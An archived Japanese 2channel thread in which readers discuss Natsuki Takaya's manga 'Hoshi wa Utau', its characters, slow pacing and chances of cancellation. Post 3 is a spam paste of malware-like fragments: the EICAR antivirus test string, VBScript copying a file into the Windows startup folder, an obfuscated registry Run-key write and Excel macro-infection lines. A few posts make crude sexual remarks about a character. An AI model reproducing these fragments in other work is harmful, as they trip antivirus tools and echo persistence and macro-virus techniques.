5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

高屋奈月・星は歌う2

1 :花と名無しさん:2007/10/14(日) 21:49:58 ID:???0
高屋奈月作品総合スレ。
連載中「星は歌う」から翼を持つ者、幻影夢想もこちらで。
フルバについては懐かし漫画板でお願いします。

前スレ
http://anime2.2ch.net/test/read.cgi/gcomic/1180848316/
高屋奈月〜フルーツバスケット2(懐かし漫画板)
http://anime2.2ch.net/test/read.cgi/rcomic/1189604960/

2 :花と名無しさん:2007/10/14(日) 22:12:11 ID:???0


3 :花と名無しさん:2007/10/14(日) 23:45:58 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :花と名無しさん:2007/10/15(月) 20:00:04 ID:???0
次号は休載か…

5 :花と名無しさん:2007/10/16(火) 02:10:14 ID:???0
梅達

6 :花と名無しさん:2007/10/16(火) 17:25:32 ID:???0
千広は本当はサクヤを好きなのに冷たくしてるとかだったらやだな
片思い漫画じゃないじゃん

7 :花と名無しさん:2007/10/17(水) 00:16:05 ID:???0
>>6
過去の好きな子(いじめられてた子?)と重ねてるのかもしれないけど
チヒロがサクヤを好きになってそうな描写は見あたらないから
今のところはまだないと思う。
いずれそうなるだろうけど

8 :花と名無しさん:2007/10/17(水) 08:13:29 ID:???O
なんだかんだでアンチがスレを進めてくれた件

9 :花と名無しさん:2007/10/17(水) 10:02:16 ID:???0
最後は総カプ間違いないだろうね

10 :花と名無しさん:2007/10/18(木) 01:36:40 ID:???O
サクヤとチヒロ以外のキャラはカップル化のためだけに
後半やっと登場するような新キャラとくっつくんだろうね

11 :花と名無しさん:2007/10/18(木) 17:29:57 ID:???O
フルバの楽羅のように誰ともくっつかない人はせめて1人いてほしい。

12 :花と名無しさん:2007/10/18(木) 22:10:53 ID:???O
そのようなキャラも後半に登場します

13 :花と名無しさん:2007/10/19(金) 17:27:08 ID:iMFxz6al0
今号は休みなんだね
次号は巻頭らしい

14 :花と名無しさん:2007/10/19(金) 18:22:09 ID:???0
猛プッシュしてるのは分かるが力がないな。

15 :花と名無しさん:2007/10/20(土) 18:13:19 ID:39vpucdM0
サクヤが実は男でおちんちんがついてたら単行本買ったのに

16 :花と名無しさん:2007/10/20(土) 18:56:35 ID:???O
空気読めなくて天然ボケで頑張り屋で根っからの良い子なトラウマor暗い過去持ち
主人公にはいい加減秋田。


17 :花と名無しさん:2007/10/20(土) 21:53:42 ID:???O
主人公かわいい。
しかし男のほうはひどいな…

18 :花と名無しさん:2007/10/20(土) 21:59:07 ID:???0
花ゆめの次号予告を見るに
チヒロはやっぱりホカンに入るらしいw
サクヤと仲良くしてほしい

19 :花と名無しさん:2007/10/21(日) 23:22:43 ID:???O
だなー。とにかく電波すぎるヒーローをなんとかせな。

20 :花と名無しさん:2007/10/24(水) 00:03:40 ID:???O
早く続き読みたい

21 :花と名無しさん:2007/10/25(木) 00:16:44 ID:???0
いっそ天敵って程いがみ合った関係のほうが面白そうだけど

22 :花と名無しさん:2007/10/25(木) 10:00:26 ID:???0
フルバのキャラや出てきた場所、あるいはそれに似たものが
ゲストっぽく出てきてくれたらうれしい

23 :花と名無しさん:2007/10/27(土) 03:53:46 ID:???0
欠かさず読んでるのに展開がイマイチつかめない。
主人公に感情移入ができんし。。
心底早く終わってほしい。
この作者、幻影とか翼の頃が一番好きだった。

24 :花と名無しさん:2007/10/27(土) 17:17:02 ID:???0
>>23
同意
自分の中で翼は神
フルバも途中までは良かったけど
翼やフルバの時に感じた新鮮さが今はもう無い・・・・・・

25 :花と名無しさん:2007/10/28(日) 02:43:07 ID:???0
絵がキモくなった頃から、話もわけわからなくなった
フルバの7巻くらいまでが限界。

26 :花と名無しさん:2007/10/28(日) 13:59:26 ID:???0
短期打ち切りはありうるの?

27 :花と名無しさん:2007/10/28(日) 19:48:14 ID:???0
フルバの時も、人気の具合によっては短期終了の予定もあったらしいので
ありうるんじゃない?

28 :花と名無しさん:2007/10/29(月) 01:35:13 ID:???0
前作がヒット作なら、前作ファンがコミックスを買う期待があるから
1巻発売までは打ち切りはナシ。1巻の売り上げが悪いと全4巻コースっぽい

けどフルバ遺産のおかげで売り上げも良好そうな予感がするよorz
掲載順も前半をキープしっ放しだし、アンケもそこそこありそう


29 :花と名無しさん:2007/10/29(月) 07:27:36 ID:???O
と、いうかここで言われているほど嫌われてないよ、この作品。

自分を含め高屋への不満を星歌の前から持ってる人はそこが改善されないことに更なる不満を抱くだけ

30 :花と名無しさん:2007/10/29(月) 11:42:22 ID:???0
似たような路線で行ったのがよかったのかな。
フルバはなんだかんだ言ってても好きだけど、
違うタイプの話が読みたかった。

31 :花と名無しさん:2007/10/29(月) 17:20:19 ID:???0
コミックス買うまではまりこんでる人がどれくらいいるかって感じだなー。
嫌われちゃいないんだけど、好き好きー!!って人があんまりいないイメージが…

32 :花と名無しさん:2007/10/30(火) 11:16:19 ID:???O
確かに…
人を確実に惹き付ける魅力が今回の作品には無いもんね。

そもそも話の構成や設定からして、長期連載を狙った話ではない気がする。
四巻程度で終わるんじゃないか?

33 :花と名無しさん:2007/10/30(火) 21:52:14 ID:???0
>>31
自分はかなり好きかも。サクヤかわいいし、チヒロもかっこいいし、
聖、ユーリも普通にいい。ストーリーもじっくり読んだらおもしろい。
主人公達が高3って時点で、長期連載ではなさそうだよね・・
大学生になってからのエピソードを描くとは考えにくいし、
卒業と同時に終わりそう。せめて10巻くらいはいってほしい。

34 :花と名無しさん:2007/10/31(水) 00:45:14 ID:???O
便乗すると、自分もかなり好きだぞ。
フルバよりずっといい。

アンチが多いから書き込まないだけで。

35 :花と名無しさん:2007/10/31(水) 07:10:25 ID:???0
面白いと思う人はどんどん書いて欲しいよ
過疎スレだし

36 :花と名無しさん:2007/10/31(水) 19:55:37 ID:???0
次号で千広がホカンに入るらしいからようやく話動き出すかな…
て毎回言ってる気がするけどw

37 :花と名無しさん:2007/11/02(金) 01:02:55 ID:???0
毎回言ってるねw
僕が歌うと君が笑うから、だっけ?
あの話も好きだと言える人なら星歌も楽しめそう

38 :花と名無しさん:2007/11/02(金) 20:17:18 ID:???0
聖も闇キャラなのかよ〜
普通の人間出せ

39 :花と名無しさん:2007/11/02(金) 20:34:15 ID:???0
相変わらず展開が遅いね…
聖が裏ありそうってのはここの予想通りか。
あの先生とくっつけそうだ。

40 :花と名無しさん:2007/11/02(金) 21:27:10 ID:???O
そうかな?ようやく動き出すかんじがして嬉しかったな。

…って、毎回なんだけどね。


しかしかなちゃんが好きな自分としては次回かなちゃんを出してほしい。

41 :花と名無しさん:2007/11/02(金) 21:29:07 ID:???0
だんだんラブコメっぽくはなってきた。

42 :花と名無しさん:2007/11/03(土) 00:31:15 ID:???O
でも面白くない

43 :花と名無しさん:2007/11/03(土) 08:54:52 ID:???0
なんかユーリと千広キャラ被ってきて無いか
キャンキャンわめく所とか
千広はクールのままでも良かった気がするなぁ

44 :花と名無しさん:2007/11/03(土) 09:32:58 ID:???0
宇宙人でも出せば人気は出る

45 :花と名無しさん:2007/11/03(土) 12:46:22 ID:???0
初期はそういう予想されてたな。
千広は宇宙人とか未来人とかでファンタジー。
ここまで来たらもう無いだろうけど。

46 :花と名無しさん:2007/11/03(土) 13:42:52 ID:???O
ファンタジーとか今さらあっても無駄に長続きしちゃうだけだろうから
この話は地味に連載して地味に早く終わるのが一番良い。
(本誌で無意味に推されてるのが虚しいよな)

…面白くなってくれることに越したことはないけど。


47 :花と名無しさん:2007/11/03(土) 14:22:48 ID:???0
今号で長いプロローグが終わったって感じだね。

48 :花と名無しさん:2007/11/03(土) 19:52:54 ID:???0
何でみんなテンション低いの??
今号で、ユーリが野次飛ばした一年の子にガツンと言ったのがよかった
自分がサクヤだったらすごいうれしいだろうと思う。
チヒロにもユーリにも守られてサクヤホントうらやましい・・

49 :花と名無しさん:2007/11/03(土) 20:43:44 ID:???O
??
別に低くないと思うが

50 :花と名無しさん:2007/11/03(土) 21:04:01 ID:???O
一度も高くなったことはない


51 :花と名無しさん:2007/11/03(土) 21:07:34 ID:???0
そんなテンション上げられるような展開でも無いからなあ

52 :花と名無しさん:2007/11/04(日) 12:44:46 ID:???O
巻頭なんだよね?
期待しちゃいないけど扉絵はどんなだったんだろ。

53 :花と名無しさん:2007/11/04(日) 13:29:33 ID:???0
>>52
右側にサクヤが手を伸ばしてるのを横から見た絵と
左端に誰かの手だけ差し伸べられてる、背景は夕暮れ。

今週の聖がユーリの傷を手当てしてる所のツーショットお似合いだった。
先生じゃなくてユーリと最終的にはくっついてほしい

54 :花と名無しさん:2007/11/04(日) 19:20:48 ID:???0
話が進むうちに、ホカンの発表の時はやし立てた集団に
認められるor和解するというような描写がほしい

55 :花と名無しさん:2007/11/05(月) 01:39:48 ID:???O
>>53
ありがとう!
…たかやんらしいかんじだね。

>>54
同意

56 :花と名無しさん:2007/11/06(火) 12:54:12 ID:???0
あのイヤらしい目でサクヤを見てる教師は何者なんだろ


57 :花と名無しさん:2007/11/06(火) 21:48:57 ID:???0
>>56
サクヤ?聖じゃなくて?

58 :花と名無しさん:2007/11/06(火) 22:23:40 ID:???O
だんだんチヒロも嫌いじゃなくってきた。
毎回言うけど次号からの展開に期待

59 :花と名無しさん:2007/11/07(水) 21:40:31 ID:???O
たかやんに恋空の原作マンガ書いてほしかったなー


なんか萌えそう…

60 :花と名無しさん:2007/11/07(水) 22:38:48 ID:???O
聖って、あの先生とむかしつき合ってたとかなのかな
それなら前回のあの思わせぶりな視線の意味も、まあなんとなく分かる気がする

61 :花と名無しさん:2007/11/08(木) 00:11:58 ID:???0
あの教師みたいな思わせぶりな大人キャラって苦手だ、特に高屋んの描くやつは。

62 :花と名無しさん:2007/11/08(木) 04:51:19 ID:bGa6B4zk0
サクヤみたいな女ってチンポ突っ込むとストーカーになるよね。マジまいったよ

63 :花と名無しさん:2007/11/09(金) 00:49:29 ID:???0
ユーリが一方的に敵視しそうではあるけど
次回から始まるであろうチヒロvsユーリが楽しみ

それにしてもサクヤは何でユーリの好意に気づかないのか。。

64 :花と名無しさん:2007/11/09(金) 01:34:51 ID:???0
>>63
天然(^^)ちゃんだからね

65 :花と名無しさん:2007/11/09(金) 13:34:34 ID:???O
ユーリいいキャラだなぁ…
彼だけはマトモなまま終わってほしい。

チヒロは徐々に好感持てるようになってきた。
一番イタいのは聖だな。
今号はサクヤが頑張ってて良かったと思う。

66 :花と名無しさん:2007/11/09(金) 14:25:27 ID:???0
ユーリってなんでチヒロと友達なんだろう?
あとチヒロと一緒に住んでる男ってどういう設定だったっけ?

67 :花と名無しさん:2007/11/09(金) 19:57:48 ID:???0
千広はヒーロー。主役の名前はサクヤだよ。
一緒に住んでる奏は親戚のニート。

68 :花と名無しさん:2007/11/09(金) 23:45:12 ID:???0
うわw指摘ありがとう

69 :花と名無しさん:2007/11/11(日) 22:40:16 ID:???0
最後は千広じゃなく奏とくっつく気がする

70 :花と名無しさん:2007/11/11(日) 22:44:54 ID:???O
友人に今はまってる漫画を聞いたら星歌だった。
フルバ信者だと思ってたけど高屋信者だったのか…

71 :花と名無しさん:2007/11/11(日) 23:01:34 ID:zVu4K76RO
ヒロインうざったい

72 :花と名無しさん:2007/11/12(月) 01:14:18 ID:???0
チヒロのお弁当がかわいいってゆうシーンがあったけど
何の伏線だろう?

73 :花と名無しさん:2007/11/13(火) 20:40:54 ID:???0
千広、サクヤに嫌い発言した時は
なにこの中2病と思ってたけど、
回を追うごとに好きになっていくなー。

74 :花と名無しさん:2007/11/16(金) 06:51:46 ID:???O
>>73
自分もチヒロは好きなキャラになってきた。
主人公も頑張ってるからまぁ良し。
問題は聖だな、主人公マンセーじゃなかったのはいいと思うけど
この作者の描く裏切りキャラはなんかイライラする。


75 :花と名無しさん:2007/11/16(金) 13:09:27 ID:EOhCa+PKO
シグレみたいに自己中過ぎてムカつくキャラじゃなきゃいいが>聖さん

76 :花と名無しさん:2007/11/18(日) 11:20:43 ID:???O
バレ読んだ。

ちょっと楽しみ。

77 :花と名無しさん:2007/11/20(火) 07:53:03 ID:???0
読んだけど展開が遅すぎると思う
前回と今回なんて1回でまとめれるだろ…

78 :花と名無しさん:2007/11/20(火) 22:43:25 ID:???0
自分は今号読んで
急に展開が早くなった気がしたな
変に脇役の話を描かず、主人公二人にスポット当ててるからだろうけど
なんか、ホントに短期連載っぽくて、好きな作品だけにさみしい
>>54
野次飛ばした子と和解してたね

79 :花と名無しさん:2007/11/21(水) 02:29:14 ID:???0
ダラダラと長く描かれてもこまる。

フルバの二の舞にな(ry

80 :花と名無しさん:2007/11/21(水) 13:12:25 ID:???0
が、配分ミスっぽくなってるな今は。

81 :花と名無しさん:2007/11/21(水) 16:07:58 ID:???0
全然レスつかないな。もはや空気漫画か…

82 :花と名無しさん:2007/11/21(水) 19:18:19 ID:???0
>>54だけど、正直意外でした。
たかやんだったら受け流すと思ってた

83 :花と名無しさん:2007/11/22(木) 09:24:16 ID:???O
チヒロがかっこよく思えてきて悔しいぞ…

しかし唐突に優しくなりすぎじゃないか?

84 :花と名無しさん:2007/11/22(木) 17:47:19 ID:???0
自分はあんま興味なくなったチヒロ
どうせならツンケンしたまま突っ走ってほしかった
片思い漫画に見えん

85 :花と名無しさん:2007/11/22(木) 23:07:27 ID:???0
サクヤ、ケータイ持ってない設定なんだね
今時珍しい
チヒロもかっこいいけど
ユーリも言動がけっこう大人で意外だった
これはこれでかっこいいし

86 :花と名無しさん:2007/11/25(日) 17:10:13 ID:???O
たかやんの描く漫画にはツンデレが必ず居るなあ

87 :花と名無しさん:2007/11/28(水) 17:24:13 ID:Kv/Ep2sfO
あげ

88 :花と名無しさん:2007/11/28(水) 18:52:33 ID:???0
すっかり過疎ったな
つまらんから無理ないけど

89 :花と名無しさん:2007/11/28(水) 23:10:29 ID:???0
面白いと思うけどな。
自分の好きな漫画にファンが多いのいやだから
個人的にはいいんだけどもw


90 :花と名無しさん:2007/11/28(水) 23:31:28 ID:???0
>>89
プ

91 :花と名無しさん:2007/11/28(水) 23:44:13 ID:???O
つまらなくないんだが面白いわけでもないんだよな、
なんか読んでる…みたいな
そこが一番問題だ。

92 :花と名無しさん:2007/11/29(木) 01:19:16 ID:???O
そうそう、なんか読んでる。最初の頃は期待と不満が入り交じって読めば色々思ったけど、
今は買ってる雑誌に載ってるから読むって程度で不満もわかないくらい興味が薄れてきた
心が離れるってこういうことなんだな、と軽く実感したよ

93 :花と名無しさん:2007/11/29(木) 17:28:49 ID:???0
次こそ面白くなる次こそって言い続けてだんだんどうでもよくなった
今号の編集の煽りも「何かが始まる予感?」てのは吹いた
編集も同じようなこと思ってるんだな

94 :花と名無しさん:2007/11/30(金) 04:39:28 ID:sI0JsLkKO
平凡凡作

95 :花と名無しさん:2007/11/30(金) 16:28:59 ID:???O
キャラクターはわりと好きなんだけどな…
話がな…

96 :花と名無しさん:2007/12/01(土) 11:51:13 ID:???O
キャラも悪くはないねって程度でキャラだけで漫画に熱中できるほど魅力はないしな
星歌の魅力は?と聞かれて消去法したら、かろうじて余ったのがキャラだけだった、って感じ

97 :花と名無しさん:2007/12/03(月) 19:04:30 ID:xESkctoAO
あげてみる

98 :花と名無しさん:2007/12/04(火) 07:44:23 ID:???O
sageろ目障りだ

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)